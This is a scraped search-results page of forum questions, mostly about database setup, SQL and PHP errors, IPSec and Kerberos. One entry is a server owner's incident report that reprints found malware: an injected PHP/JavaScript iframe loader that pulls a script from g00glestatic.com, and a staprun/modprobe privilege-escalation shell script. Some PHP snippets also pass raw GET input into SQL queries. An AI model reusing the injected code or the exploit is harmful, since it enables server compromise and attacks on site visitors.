Search Results

Search found 41147 results on 1646 pages for 'database security'.

Page 275/1646 | < Previous Page | 271 272 273 274 275 276 277 278 279 280 281 282 | Next Page >

Storing date/times as UTC in database

- by James

I am storing date/times in the database as UTC and computing them inside my application back to local time based on the specific timezone. Say for example I have the following date/time: 01/04/2010 00:00 Say it is for a country e.g. UK which observes DST (Daylight Savings Time) and at this particular time we are in daylight savings. When I convert this date to UTC and store it in the database it is actually stored as: 31/03/2010 23:00 As the date would be adjusted -1 hours for DST. This works fine when your observing DST at time of submission. However, what happens when the clock is adjusted back? When I pull that date from the database and convert it to local time that particular datetime would be seen as 31/03/2009 23:00 when in reality it was processed as 01/04/2010 00:00. Correct me if I am wrong but isn't this a bit of a flaw when storing times as UTC? Example of Timezone conversion Basically what I am doing is storing the date/times of when information is being submitted to my system in order to allow users to do a range report. Here is how I am storing the date/times: public DateTime LocalDateTime(string timeZoneId) { var tzi = TimeZoneInfo.FindSystemTimeZoneById(timeZoneId); return TimeZoneInfo.ConvertTimeFromUtc(DateTime.UtcNow, tzi).ToLocalTime(); } Storing as UTC: var localDateTime = LocalDateTime("AUS Eastern Standard Time"); WriteToDB(localDateTime.ToUniversalTime());

Read the article
Querying a 3rd party website's database from my website

- by Mong134

The Goal: To retrieve information from a 3rd party database based off of a user's query on my ASP.NET website The Details: I need to be able to search 3rd-party websites for information relating to pharmaceutical drugs. Basically, here's what I've been tasked with: a user starts entering the name of a drug they're using in their experiments, and while they're typing a 3rd party website (e.g., here or here) is queried and suggestions are made based based off of what they've typed. Once they've made a selection, certain properties (molecular weight, chemical structure, etc) are retrieved from the 3rd party database and stored in our database. PharmaGKB.org's search bar is pretty much what I need to implement, but I need to access a 3rd party db. The site that I'm working on is ASP.NET/C#. The Problem: I don't really know where to start with this. There's a downloadable Perl example at the bottom of the page here, but it didn't really help me all that much. I'm at a loss as to how to implement this, or even find information about how to do it. The AJAX toolkit was suggested, but I'm not sure if that will solve the issue. JavaScript is also being considered, but again, I'm not sure if that will be sufficient, either. Perl Example Connection As a mentioned, here is a snippet from the Perl example given on the Pharmgkb.org site: my $call = SOAP::Lite -> readable (1) -> uri('SearchService') -> proxy('http://www.pharmgkb.org/services/SearchService') -> search ($ARGV[0]); However, I'm not sure how to implement this is C#/ASP.NET/JavaScript. There's a question on Stack Overflow about embedding Perl in C#, but it require a C wrapper as well, and I don't think that three languages is necessary or wise to solve this issue.

Read the article
ASP.NET MVC 2 user input to SQL 2008 Database problems

- by Rob

After my publish in VS2010 the entire website loads and pulls data from the database perfectly. I can even create new users through the site with the correct key code, given out to who needs access. I have two connection strings in my web.config file The first: <add xdt:Transform="SetAttributes" xdt:Locator="Match(name)" name="EveModelContainer" connectionString="metadata=res://*/Models.EdmModel.EveModel.csdl|res://*/Models.EdmModel.EveModel.ssdl|res://*/Models.EdmModel.EveModel.msl;provider=System.Data.SqlClient;provider connection string="Data Source=localhost;Initial Catalog=fleet;Persist Security Info=True;User ID=fleet;Password=****"" providerName="System.Data.EntityClient" /> The second: <add xdt:Transform="SetAttributes" xdt:Locator="Match(name)" name="ApplicationServices" connectionString="Data Source=localhost;Initial Catalog=fleet;Persist Security Info=True;User ID=fleet;Password=****;MultipleActiveResultSets=True" /> The first one is the one that is needed to post data with the main application, EveModelContainer. Everything else is pulled using the standard ApplicationServices connection. Do you see anything wrong with my connectionstring? I'm at a complete loss here. The site works perfectly on my friends server and not on mine... Could it be a provider issue? And if I go to iis 7's manager console, and click .net users I get a pop up message saying the custom provider isn't a trusted provider do I want to allow it to run at a higher trust level. I'm at the point where I think its either my string or this trusted provider error... but I have no clue how to add to the trusted provider list... Thank you in advance!!!

Read the article
Database cache that I'm not aware of?

- by Martin

I'm using asp.net mvc, linq2sql, iis7 and sqlserver express 2008. I get these intermittent server errors, primary key conflicts on insertion. I'm using a different setup on my development computer so I can't debug. After a while they go away. Restarting iis helps. I'm getting the feeling there is cache somewhere that I'm not aware of. Can somebody help me sort out these errors? Cannot insert duplicate key row in object 'dbo.EnquiryType' with unique index 'IX_EnquiryType'. Edits regarding Venemos answer Is it possible that another application is also accessing the same database simultaneously? Yes there is, but not this particular table and no inserts or updates. There is one other table with which I experience the same problem but it has to do with a different part of the model. How often an in what context do you create a new DataContext instance? Only once, using the singleton pattern. Are the primary keys generated by the database or by the application? Database. Which version of ASP.NET MVC and which version of .NET are you using? RC2 and 3.5.

Read the article
SQL trigger to delete rows from database

- by wpearse

I have an industrial system that logs alarms to a remotely hosted MySQL database. The industrial system inserts a new row whenever a property of the alarm changes (such as the time the alarm was activated, acknowledged or switched off) into a table named 'alarms'. I don't want multiple records for each alarm, so I have set up two database triggers. The first trigger mirrors each new record to a second table, creating/updating rows as required: CREATE TRIGGER `mirror_alarms` BEFORE INSERT ON `alarms` FOR EACH ROW INSERT INTO `alarm_display` (Tag,...,OffTime) VALUES (new.Tag,...,new.OffTime) ON DUPLICATE KEY UPDATE OnDate=new.OnDate,...,OffTime=new.OffTime The second trigger should execute after the first and (ideally) delete all rows from the alarms table. (I used the Tag property of the alarm because the Tag property never changes, although I suspect I could just use a 'DELETE FROM alarms WHERE 1' statement to the same effect). CREATE TRIGGER `remove_alarms` AFTER INSERT ON `alarms` FOR EACH ROW DELETE FROM alarms WHERE Tag=new.Tag My problem is that the second trigger doesn't appear to run, or if it does, the second trigger doesn't delete any rows from the database. So here's the question: why does my second trigger not do what I expect it to do?

Read the article
SQL Database Schema Design For Large 3 Billion Relationship Database.

- by K-Bell

Get your geek on. Can you solve this? I am designing a products database for SQL Server 2008 R2 Ed. (not Enterprise Ed.) that will be used to store custom product configurations for over 30,000 distinct products. The database will have up to 500 users at a time. Here is the design problem… Each Product has a collection of Parts (up to 50 parts per product). So if I have 30,000 Products and each of them can have up to 50 Parts, that’s 1.5 million distinct Product-to-Part relationships …or as an equation… 30,000 (Products) X 50 (Parts) = 1.5 million Product-to-Parts records. …and If… Each Part can have up to 2000 finish options (A finish is a paint color). NOTE: Only one finish will be selected by a user at run-time. The 2000 finish options I need to store are the allowed options for a specific part on a specific product. So if I have 1.5 million distinct product-to-part relationships/records and each of those parts can have up to 2,000 finishes that is 3 billion allowable product-to-part-to finish relationships/records …or as an equation… 1.5 million (Parts) x 2,000 (Finishes) = 3 Billion Product-to-Part-to-Finishes records. How can I design this database so that I can execute fast and efficient queries for a specific product and return its list of Parts and all the allowable Finishes for each part without 3 Billion Product-to-Part-to-Finish records? Read time is more important then write time. Please post your thoughts/suggestions if you have experience with large databases. Thanks!

Read the article
.NET Application with SQL Server CE Database

- by blu

I just started using SQL Server CE 3.5 in my WinForms Application (C# in VS 2008 SP1). I've noticed a couple of interesting things I'd like some input on: 1. Copying of sdf file to bin My sdf file is located inside of an Infrastructure project that houses my repository implementations. When the application is first debugged the sdf was copied to debug\bin. This is where all future reads/writes operate. At some point when this is deployed the file will go into a data folder using Click Once, but during development where should I be putting this sdf? Is having it in the bin typical, or are there any other recommendations? 2. Updating sdf It appears that writing to the sdf file does not immediately update the database. I am using Linq-to-SQL and am calling SubmitChanges, but on read the values are not returned. However if I close the application and re-open it the added value is there. Is there an additional flush step I need to take? What is causing this, file locking, buffering, something else? Update 3. Unit Tests I have an MS test project, and the sdf file is not being copied to the correct output directory. I have the settings: Build Action: Content Copy to Output Directory: Copy Always The message is: System.Data.SqlServerCe.SqlCeException: The database file cannot be found. Check the path to the database. I appreciate any guidance on these questions, thanks. If there is a tutorial other than what is on MSDN that you know about that would be great too. Working with CE is proving to be a difficult task and I welcome any help I can find.

Read the article
Ruby on Rails login using legacy user database

- by ricsmania

Hello, I have a Rails application that connects to a legacy database (Oracle) and displays some information from a particular user. Right now the user is passed as a URL parameter, but this has obvious security issues because users should only be able to see their own data. To solve that, I want to implement a user login, and I did some research and came across 2 components for that, restful_authentication and authlogic. The problem is that I need to use an existing user/password database instead of creating a new one, which is the common way to use those components. The password is encrypted by a custom Oracle package, but let's assume it is stored as plain text to make things simpler. I only need very basic functionality, which is login a user and keep them logged in forever until logout. No changes to the database will be made by this application, so there's no need for sign up, e-mail activation, reset password, etc. Can someone point me in the right direction on how to do that? Is any of those 2 components a good solution? If not, what would be recommended? Thanks!

Read the article
Selecting Date Range on a PHP form and displaying results from MySQL database

- by Sarah HSL

This may be something simple but I cant understand why this wouldn't work.. I have a php form where you can select a date range from drop downs. I've given the field names day, month year, and day1, month1, year1. When clicking submit it takes you to a second php form. Here is the code for second form: <?php $username="***"; $password="***"; $database="****"; mysql_connect('localhost',$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $day = $_GET['day']; $month = $_GET['month']; $year = $_GET['year']; $day1 = $_GET['day1']; $month1 = $_GET['month1']; $year1 = $_GET['year1']; $date1 = "$year-$month-$day"; $date2 = "$year1-$month1-$day1"; $query = "SELECT * FROM main_stock WHERE curr_timestamp BETWEEN '$date1' AND '$date2'"; $result=mysql_query($query); $num=mysql_num_rows($result); ?> <table border="1" cellspacing="2" cellpadding="2"> <tr> <td>Product Description</td> <td>Category</td> <td>Master Category</td> <td>Barcode</td> <td>Status</td> <td>TimeStamp</td> <td>New Own</td> <td>Serial No.</td> </tr> <?php $i=0; while ($i < $num) { $f1=mysql_result($result,$i,"product_desc"); $f2=mysql_result($result,$i,"category"); $f3=mysql_result($result,$i,"mastercategory"); $f4=mysql_result($result,$i,"barcode"); $f5=mysql_result($result,$i,"status"); $f6=mysql_result($result,$i,"curr_timestamp"); $f7=mysql_result($result,$i,"newown"); $f8=mysql_result($result,$i,"serial"); ?> <tr> <td><?php echo $f1; ?></td> <td><?php echo $f2; ?></td> <td><?php echo $f3; ?></td> <td><?php echo $f4; ?></td> <td><?php echo $f5; ?></td> <td><?php echo $f6; ?></td> <td><?php echo $f7; ?></td> <td><?php echo $f8; ?></td> </tr> <?php $i++; } $num_rows = mysql_num_rows($result); echo "$num_rows Rows\n"; mysql_close(); ?> Is there any reason this wouldn't work? I'm not sure where I am going wrong. It displays results when there is another option as well as the date such as 'status' but when this is taken out and I just want to display all the results between the date range it doesn't work.. This works: <?php $username="+++"; $password="+++"; $database="+++"; mysql_connect('localhost',$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $day = $_GET['day']; $month = $_GET['month']; $year = $_GET['year']; $day1 = $_GET['day1']; $month1 = $_GET['month1']; $year1 = $_GET['year1']; $status = $_GET['status']; $date1 = "$year-$month-$day"; $date2 = "$year1-$month1-$day1"; $query = "SELECT * FROM main_stock WHERE status = '$status' AND curr_timestamp BETWEEN '$date1' AND '$date2'"; $result=mysql_query($query); $num=mysql_num_rows($result); ?> <table border="1" cellspacing="2" cellpadding="2"> <tr> <td>Product Description</td> <td>Category</td> <td>Master Category</td> <td>Barcode</td> <td>Status</td> <td>TimeStamp</td> <td>New Own</td> <td>Serial No.</td> </tr> <?php $i=0; while ($i < $num) { $f1=mysql_result($result,$i,"product_desc"); $f2=mysql_result($result,$i,"category"); $f3=mysql_result($result,$i,"mastercategory"); $f4=mysql_result($result,$i,"barcode"); $f5=mysql_result($result,$i,"status"); $f6=mysql_result($result,$i,"curr_timestamp"); $f7=mysql_result($result,$i,"newown"); $f8=mysql_result($result,$i,"serial"); ?> <tr> <td><?php echo $f1; ?></td> <td><?php echo $f2; ?></td> <td><?php echo $f3; ?></td> <td><?php echo $f4; ?></td> <td><?php echo $f5; ?></td> <td><?php echo $f6; ?></td> <td><?php echo $f7; ?></td> <td><?php echo $f8; ?></td> </tr> <?php $i++; } $num_rows = mysql_num_rows($result); echo "$num_rows Rows\n"; mysql_close(); ?> But when the 'status' field is taken out (and obviously the serial drop down in the first form) it stops working...

Read the article
SQL query error while trying to put a file in the database

- by DaGhostman Dimitrov

Hey Guys I have a big problem that I have no Idea why.. I have few forms that upload files to the database, all of them work fine except one.. I use the same query in all(simple insert). I think that it has something to do with the files i am trying to upload but I am not sure. Here is the code: if ($_POST['action'] == 'hndlDocs') { $ref = $_POST['reference']; // Numeric value of $doc = file_get_contents($_FILES['doc']['tmp_name']); $link = mysqli_connect('localhost','XXXXX','XXXXX','documents'); mysqli_query($link,"SET autocommit = 0"); $query = "INSERT INTO documents ({$ref}, '{$doc}', '{$_FILES['doc']['type']}') ;"; mysqli_query($link,$query); if (mysqli_error($link)) { var_dump(mysqli_error($link)); mysqli_rollback($link); } else { print("<script> window.history.back(); </script>"); mysqli_commit($link); } } The database has only these fields: DATABASE documents ( reference INT(5) NOT NULL, //it is unsigned zerofill doc LONGBLOB NOT NULL, //this should contain the binary data mime_type TEXT NOT NULL // the mime type of the file php allows only application/pdf and image/jpeg ); And the error I get is : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00001, '????' at line 1 I will appreciate every help. Cheers!

Read the article
Trouble tunneling my local Wordpress install to the mysql database on appfog

- by alanmoo

I've set up a wordpress install on appfog (using rackspace), and cloned the install to my local machine for development. I know the install works (using MAMP) because I created a local mysql database and changed wp-config.php to point to it. However, I want to develop without having to change wp-config.php every time I commit. After doing some research, it seems like the Appfog service Caldecott lets me tunnel into the mysql database on the server, using af tunnel. Unfortunately, I'm having issues with getting it working. Even if I change my MAMP mysql port to something like 8889, and tunnel mysql through port 3306, it looks like it's connected but I still get "Error establishing a database connection" when loading my localhost Wordpress. When I quit the mysql monitor (using ctrl+x, ctrl+c), I get a message stating "Error: 'mysql' execution failed; is it in your $PATH?'. Originally, no, it wasn't, but I've fixed my PATH variable on my local machine so that when I go to Terminal and just type mysql, it loads up. So I guess my question is 2 parts: 1.)Am I going with the right approach for Wordpress development on my local machine and 2.)If so, why is the tunnel not working?

Read the article
No database connection when trying to use IIS locally with asp.net MVC 1.0

- by mark4asp

Login failed for user ''. The user is not associated with a trusted SQL Server connection. When I try to use IIS locally instead of Cassini I get this error. The ASP.NET MVC 1.0 site is running on WinXP. The database is local and has SQL Server and Windows Authentification mode enabled. The website runs OK using Cassini, with the same connection string. It fails when I try to use IIS instead of Cassini. These permissions are set on the Virtual directory which IIS points to. ASP.NET Machine Account [Full Control] Internet Guest Account [Full Control] System [Full Control] This virtual directory is the same are the directory holding my project files. I am using Linq and the database connection string is stored in the App.config file of my data project. I get the same error whether I set the connection string to use Windows or Sql server authentification. My sql server has both [MyMachineName\ASPNET] and SqlServerUser Logins and a User on the database. CREATE LOGIN [MyMachineName\ASPNET] FROM WINDOWS WITH DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english] Use My_database CREATE USER [MyMachineName\ASPNET] FOR LOGIN [MyMachineName\ASPNET] WITH DEFAULT_SCHEMA=[dbo] CREATE LOGIN [MwMvcLg] WITH PASSWORD=N'blahblah', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[British], CHECK_EXPIRATION=OFF, CHECK_POLICY=ON Use My_database CREATE USER [MwMvcLg] FOR LOGIN [MwMvcLg] WITH DEFAULT_SCHEMA=[dbo] How come I have no problem running this website on IIS6 remotely. Why does IIS5.1, running locally, need these extra logins? PS: My overwhelming preference is to use Sql Server authentification - as this is how it runs when deployed.

Read the article
upload new file first check if this file exist already in database or not then if not exist save that in database

- by Hala Qaseam

I'm trying to create sql database that contains Image Id (int) Imagename (varchar(50)) Image (image) and in aspx write in upload button this code: protected void btnUpload_Click(object sender, EventArgs e) { //Condition to check if the file uploaded or not if (fileuploadImage.HasFile) { //getting length of uploaded file int length = fileuploadImage.PostedFile.ContentLength; //create a byte array to store the binary image data byte[] imgbyte = new byte[length]; //store the currently selected file in memeory HttpPostedFile img = fileuploadImage.PostedFile; //set the binary data img.InputStream.Read(imgbyte, 0, length); string imagename = txtImageName.Text; //use the web.config to store the connection string SqlConnection connection = new SqlConnection(strcon); connection.Open(); SqlCommand cmd = new SqlCommand("INSERT INTO Image (ImageName,Image) VALUES (@imagename,@imagedata)", connection); cmd.Parameters.Add("@imagename", SqlDbType.VarChar, 50).Value = imagename; cmd.Parameters.Add("@imagedata", SqlDbType.Image).Value = imgbyte; int count = cmd.ExecuteNonQuery(); connection.Close(); if (count == 1) { BindGridData(); txtImageName.Text = string.Empty; ScriptManager.RegisterStartupScript(this, this.GetType(), "alertmessage", "javascript:alert('" + imagename + " image inserted successfully')", true); } } } When I'm uploading a new image I need to first check if this image already exists in database and if it doesn't exist save that in database. Please how I can do that?

Read the article
Error in inserting data into database

- by Matthew

When I try to run this code it will not insert the data into the database? <?php class Database { private $dsn; function __construct($dbname, $host, $user, $password, $enckey) { $this->dsn = "mysql:dbname=" . $dbname . ';host=' . $host; $this->user = $user; $this->password = $password; } private function createDSN() { return $this->dsn; } public function createConnection() { try { $dbh = new PDO(self::createDSN(), $this->user, $this->password); } catch (PDOException $e) { echo 'Connection failed: ' . $e->getMessage(); } return $dbh; } } $db = new Database('mytest', 'localhost', 'root', 'hashedpassword', null); $dbh = $db->createConnection(); $sql = $dbh->prepare("INSERT INTO contacts (firstname, lastname) VALUES (?,?)"); $sql->execute(array("abc", "xyz")); ?>

Read the article
entering datas of php page to database

- by Rahima farzana.S

I have a php form with two text boxes and i want to enter the text box values into the database. I have created the table (with two columns namely webmeasurementsuite id and webmeasurements id) I used the following syntax for creating table: CREATE TABLE `radio` ( `webmeasurementsuite id` INT NOT NULL, `webmeasurements id` INT NOT NULL ); Utilising the tutorial in the following link, I wrote the php coding but unfortunately the datas are not getting entered into the database. I am getting an error in the insert sql syntax. I checked it but i am not able to trace out the error.Can anyone correct me? I got the coding from http://www.webune.com/forums/php-how-to-enter-data-into-database-with-php-scripts.html $sql = "INSERT INTO $db_table(webmeasurementsuite id,webmeasurements id) values ('".mysql_real_escape_string(stripslashes($_REQUEST['webmeasurementsuite id']))."','".mysql_real_escape_string(stripslashes($_REQUEST['webmeasurements id']))."')"; echo$sql; My error is as follows: INSERT INTO radio(webmeasurementsuite id,webmeasurements id) values ('','')ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id,webmeasurements id) values ('','')' at line 1

Read the article
CakePHP: Missing database table

- by Justin

I have a CakePHP application that is running fine locally. I uploaded it to a production server and the first page that uses a database connection gives the "Missing Database Table" error. When I look at the controller dump, it's complaining about the first table. I've tried a variety of things to fix this problem, with no luck: I've confirmed that at the command line I can login with the given MySQL credentials in database.php I've confirmed this table exists I've tried using the MySQL root credentials (temporarily) to see if the problem lies with permissions of the user. The same error appeared. My debug level is currently set to 3 I've deleted the entire contents of /app/tmp/cache I've set 777 permissions on /app/tmp* I've confirmed that I can run DESCRIBE commands at the commant line MySQL when logged in with the MySQL credentials used by by the application I've verified that the CakePHP log file only contains the error I'm setting in the browser window. I've tried all the suggestions I could find in similar postings on SO I've Googled around and didn't find any other ideas I think I've eliminating the obvious problems and my research isn't turning anything up. I feel like I'm missing something obvious. Any ideas?

Read the article
OpenSwan IPSec phase #2 complications

- by XXL

Phase #1 (IKE) succeeds without any problems (verified at the target host). Phase #2 (IPSec), however, is erroneous at some point (apparently due to misconfiguration on localhost). This should be an IPSec-only connection. I am using OpenSwan on Debian. The error log reads the following (the actual IP-addr. of the remote endpoint has been modified): pluto[30868]: "x" #2: initiating Quick Mode PSK+ENCRYPT+PFS+UP+IKEv2ALLOW+SAREFTRACK {using isakmp#1 msgid:5ece82ee proposal=AES(12)_256-SHA1(2)_160 pfsgroup=OAKLEY_GROUP_DH22} pluto[30868]: "x" #1: ignoring informational payload, type NO_PROPOSAL_CHOSEN msgid=00000000 pluto[30868]: "x" #1: received and ignored informational message pluto[30868]: "x" #1: the peer proposed: 0.0.0.0/0:0/0 - 0.0.0.0/0:0/0 pluto[30868]: "x" #3: responding to Quick Mode proposal {msgid:a4f5a81c} pluto[30868]: "x" #3: us: 192.168.1.76<192.168.1.76[+S=C] pluto[30868]: "x" #3: them: 222.222.222.222<222.222.222.222[+S=C]===10.196.0.0/17 pluto[30868]: "x" #3: transition from state STATE_QUICK_R0 to state STATE_QUICK_R1 pluto[30868]: "x" #3: STATE_QUICK_R1: sent QR1, inbound IPsec SA installed, expecting QI2 pluto[30868]: "x" #1: ignoring informational payload, type NO_PROPOSAL_CHOSEN msgid=00000000 pluto[30868]: "x" #1: received and ignored informational message pluto[30868]: "x" #3: next payload type of ISAKMP Hash Payload has an unknown value: 97 X pluto[30868]: "x" #3: malformed payload in packet pluto[30868]: | payload malformed after IV I am behind NAT and this is all coming from wlan2. Here are the details: default via 192.168.1.254 dev wlan2 proto static 169.254.0.0/16 dev wlan2 scope link metric 1000 192.168.1.0/24 dev wlan2 proto kernel scope link src 192.168.1.76 metric 2 Output of ipsec verify: Checking your system to see if IPsec got installed and started correctly: Version check and ipsec on-path [OK] Linux Openswan U2.6.37/K3.2.0-24-generic (netkey) Checking for IPsec support in kernel [OK] SAref kernel support [N/A] NETKEY: Testing XFRM related proc values [OK] [OK] [OK] Checking that pluto is running [OK] Pluto listening for IKE on udp 500 [OK] Pluto listening for NAT-T on udp 4500 [OK] Two or more interfaces found, checking IP forwarding [OK] Checking NAT and MASQUERADEing [OK] Checking for 'ip' command [OK] Checking /bin/sh is not /bin/dash [WARNING] Checking for 'iptables' command [OK] Opportunistic Encryption Support [DISABLED] This is what happens when I run ipsec auto --up x: 104 "x" #1: STATE_MAIN_I1: initiate 003 "x" #1: received Vendor ID payload [RFC 3947] method set to=109 106 "x" #1: STATE_MAIN_I2: sent MI2, expecting MR2 003 "x" #1: received Vendor ID payload [Cisco-Unity] 003 "x" #1: received Vendor ID payload [Dead Peer Detection] 003 "x" #1: ignoring unknown Vendor ID payload [502099ff84bd4373039074cf56649aad] 003 "x" #1: received Vendor ID payload [XAUTH] 003 "x" #1: NAT-Traversal: Result using RFC 3947 (NAT-Traversal): i am NATed 108 "x" #1: STATE_MAIN_I3: sent MI3, expecting MR3 004 "x" #1: STATE_MAIN_I4: ISAKMP SA established {auth=OAKLEY_PRESHARED_KEY cipher=aes_128 prf=oakley_sha group=modp1024} 117 "x" #2: STATE_QUICK_I1: initiate 010 "x" #2: STATE_QUICK_I1: retransmission; will wait 20s for response 010 "x" #2: STATE_QUICK_I1: retransmission; will wait 40s for response 031 "x" #2: max number of retransmissions (2) reached STATE_QUICK_I1. No acceptable response to our first Quick Mode message: perhaps peer likes no proposal 000 "x" #2: starting keying attempt 2 of at most 3, but releasing whack I have enabled NAT traversal in ipsec.conf accordingly. Here are the settings relative to the connection in question: version 2.0 config setup plutoopts="--perpeerlog" plutoopts="--interface=wlan2" dumpdir=/var/run/pluto/ nat_traversal=yes virtual_private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12 oe=off protostack=netkey conn x authby=secret pfs=yes auto=add phase2alg=aes256-sha1;dh22 keyingtries=3 ikelifetime=8h type=transport left=192.168.1.76 leftsubnet=192.168.1.0/24 leftprotoport=0/0 right=222.222.222.222 rightsubnet=10.196.0.0/17 rightprotoport=0/0 Here are the specs provided by the other end that must be met for Phase #2: encryption algorithm: AES (128 or 256 bit) hash algorithm: SHA local ident1 (addr/mask/prot/port): (10.196.0.0/255.255.128.0/0/0) local ident2 (addr/mask/prot/port): (10.241.0.0/255.255.0.0/0/0) remote ident (addr/mask/prot/port): (x.x.x.x/x.x.x.x/0/0) (internal network or localhost) Security association lifetime: 4608000 kilobytes/3600 seconds PFS: DH group2 So, finally, what might be the cause of the issue that I am experiencing? Thank you.

Read the article
Mass targeted malware installed - g00glestatic.com [closed]

- by Silver89

Possible Duplicate: My server’s been hacked EMERGENCY I run a webserver which over the last few days seems to have become infected with malware that tries to include content from "http://g00glestatic.com/s.js" It appears the attacker gained access to one of the user accounts (not root), made a few changes, added a few files and ran a few bash commands. These changes stuck out clearly to me because it is not a shared server and I am the only person with access through very secure passwords. The php/javascript code that was added .php files, this code was added: #9c282e# if(!$srvc_counter) { echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>"; $srvc_counter = true;} #/9c282e# .js files, this code was added: /*9c282e*/ var _f = document.createElement('iframe'),_r = 'setAttribute'; _f[_r]('src', 'http://g00glestatic.com/s.js'); _f.style.position = 'absolute';_f.style.width = '10px'; _f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1); _f.style.left = '-5540px'; document.write('<div id=\'MIX_ADS\'></div>'); document.getElementById('MIX_ADS').appendChild(_f); /*/9c282e*/ The bash command taken from .bash_history (Some usernames/passwords have been subbed) su -c id $replacedPassword id; id; sudo id; replacedPassword id; cd /home/replacedUserId1; chmod +x .sess_28e2f1bc755ed3ca48b32fbcb55b91a7; ./.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; rm /home/replacedUserId1/.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; id; cd /home/replacedUserId1; chmod +x .sess_05ee5257fed0ac8e0f12096f4c3c0d20; ./.sess_05ee5257fed0ac8e0f12096f4c3c0d20; rm /home/replacedUserId1/.sess_05ee5257fed0ac8e0f12096f4c3c0d20; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; ./.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; rm /home/replacedUserId1/.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; id; kill -9 $$;; kill -9 $$;; kill -9 $$; The above seems to move files added to the public_html to the level above? I also have all 4 of the files that were added: .sess_28e2f1bc755ed3ca48b32fbcb55b91a7 .sess_05ee5257fed0ac8e0f12096f4c3c0d20 .sess_bfa542fc2578cce68eb373782c5689b9 .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e Of those four above files, three are none viewable in notepad++ and display null characters, whereas sess_fb19dfb52ed4a3ae810cd4454ac6ef1e consists of: #!/bin/sh export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin; export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8 export TERM=linux echo -n "-> checking staprun: "; if which staprun 2>&1 | grep -q "no $1"; then flag=1 elif [ -z "`which $1 2>&1`" ]; then flag=1; fi if [ "$flag" = "1" ]; then echo "no staprun, exiting"; exit; else echo "found"; echo "-> trying to exploit... "; printf "install uprobes /bin/sh" > ololo.conf; MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo rm -f ololo.conf fi Other Noticeable Edits Any files that contain: ([.htaccess]|[index|header|footer].php|[*.js]) will have been modified and all system file and directory permissions will have been changed to: x--x--x My steps to remove this malware re uploaded original php/js files to revert any changes Changed all user passwords Modified hosts.allow to a static ip so that only I have access Removed the above 4 files and checked all modified file dates within that directory to check for any other recent modifications, none can be found Conclusion I'm hoping that as they did not have root access, any changes they wished to make higher up failed and they were only able to display an iframe on the site for a short amount of time? What else do I need to look for to check the malware infection has not spread? Second Conclusion This malware sinks too deep to 'clean', if you get infected I recommend a server nuke and rebuild from backups with increased security. Possibility It's possible that Filezilla ftp passwords were stolen through a trojan as they're unfortunately stored unencrypted. However Trend Micro Titanium has not found any. The settings box to disable passwords being saved has now been ticked, I also recommend that you take this action.

Read the article
Authenticating Windows 7 against MIT Kerberos 5

- by tommed

Hi There, I've been wracking my brains trying to get Windows 7 authenticating against a MIT Kerberos 5 Realm (which is running on an Arch Linux server). I've done the following on the server (aka dc1): Installed and configured a NTP time server Installed and configured DHCP and DNS (setup for the domain tnet.loc) Installed Kerberos from source Setup the database Configured the keytab Setup the ACL file with: *@TNET.LOC * Added a policy for my user and my machine: addpol users addpol admin addpol hosts ank -policy users [email protected] ank -policy admin tom/[email protected] ank -policy hosts host/wdesk3.tnet.loc -pw MYPASSWORDHERE I then did the following to the windows 7 client (aka wdesk3): Made sure the ip address was supplied by my DHCP server and dc1.tnet.loc pings ok Set the internet time server to my linux server (aka dc1.tnet.loc) Used ksetup to configure the realm: ksetup /SetRealm TNET.LOC ksetup /AddKdc dc1.tnet.loc ksetip /SetComputerPassword MYPASSWORDHERE ksetip /MapUser * * After some googl-ing I found that DES encryption was disabled by Windows 7 by default and I turned the policy on to support DES encryption over Kerberos Then I rebooted the windows client However after doing all that I still cannot login from my Windows client. :( Looking at the logs on the server; the request looks fine and everything works great, I think the issue is that the response from the KDC is not recognized by the Windows Client and a generic login error appears: "Login Failure: User name or password is invalid". The log file for the server looks like this (I tail'ed this so I know it's happening when the Windows machine attempts the login): Screen-shot: http://dl.dropbox.com/u/577250/email/login_attempt.png If I supply an invalid realm in the login window I get a completely different error message, so I don't think it's a connection problem from the client to the server? But I can't find any error logs on the Windows machine? (anyone know where these are?) If I try: runas /netonly /user:[email protected] cmd.exe everything works (although I don't get anything appear in the server logs, so I'm wondering if it's not touching the server for this??), but if I run: runas /user:[email protected] cmd.exe I get the same authentication error. Any Kerberos Gurus out there who can give me some ideas as to what to try next? pretty please?

Read the article
A separate user for each task?

- by Mark Tomlin

